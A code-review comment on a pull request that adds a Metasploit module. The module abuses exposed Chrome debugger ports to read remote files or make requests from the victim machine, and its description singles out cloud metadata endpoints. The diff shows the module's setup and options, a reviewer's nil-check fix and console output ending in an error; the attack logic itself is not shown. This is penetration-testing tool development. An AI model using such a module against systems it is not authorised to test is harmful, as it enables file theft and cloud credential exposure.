modules/auxiliary/gather/chrome_debugger.rb

```diff
@@ -0,0 +1,124 @@
+class MetasploitModule < Msf::Auxiliary
+  require 'eventmachine'
+  require 'faye/websocket'
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'Chrome Debugger Arbitrary File Read / Arbitrary Web Request',
+      'Description' => %q{
+        This module uses the Chrome Debugger's API to read
+        files off the remote file system, or to make web requests
+        from a remote machine.  Useful for cloud metadata endpoints!
+      },
+      'License' => MSF_LICENSE,
+      'Author' => [
+        'Adam Baldwin (Evilpacket)', # Original ideas, research, proof of concept, and msf module
+        'Nicholas Starke (The King Pig Demon)' # msf module
+      ],
+      'Privileged' => false,
+      'Targets' => [
+      ],
+      'DisclosureDate' => 'Sep 24 2019',
+      'DefaultOptions' => {
+      },
+      'DefaultTarget' => 0
+    ))
+
+    register_options(
+      [
+        Opt::RHOST,
+        Opt::RPORT(9222),
+        OptString.new('FilePath', [ false, 'File to fetch from remote machine.']),
+        OptString.new('Url', [ false, 'Url to fetch from remote machine.']),
+        OptInt.new('Timeout', [ true, 'Time to wait for response', 10])
+      ]
+    )
+
+    deregister_options('Proxies')
+  end
+
+  def run
+
+    if datastore['FilePath'].empty? and datastore['Url'].empty?
```

Comment:
```suggestion
    if (datastore['FilePath'].nil? || datastore['FilePath'].empty?) && (datastore['Url'].nil? || datastore['Url'].empty?)
```
Testing shows this needs to better guard for access on nil

```
msf5 > use auxiliary/gather/chrome_debugger
msf5 auxiliary(gather/chrome_debugger) > set RHOST xxx.xxx.xxx.xxx
RHOST => xxx.xxx.xxx.xxx
msf5 auxiliary(gather/chrome_debugger) > set RPORT 9222
RPORT => 9222
msf5 auxiliary(gather/chrome_debugger) > set Url github.com
Url => github.com
msf5 auxiliary(gather/chrome_debugger) > run
[*] Running module against xxx.xxx.xxx.xxx

[-] Auxiliary failed: NoMethodError undefined method `empty?' for nil:NilClass
[-] Call stack:
```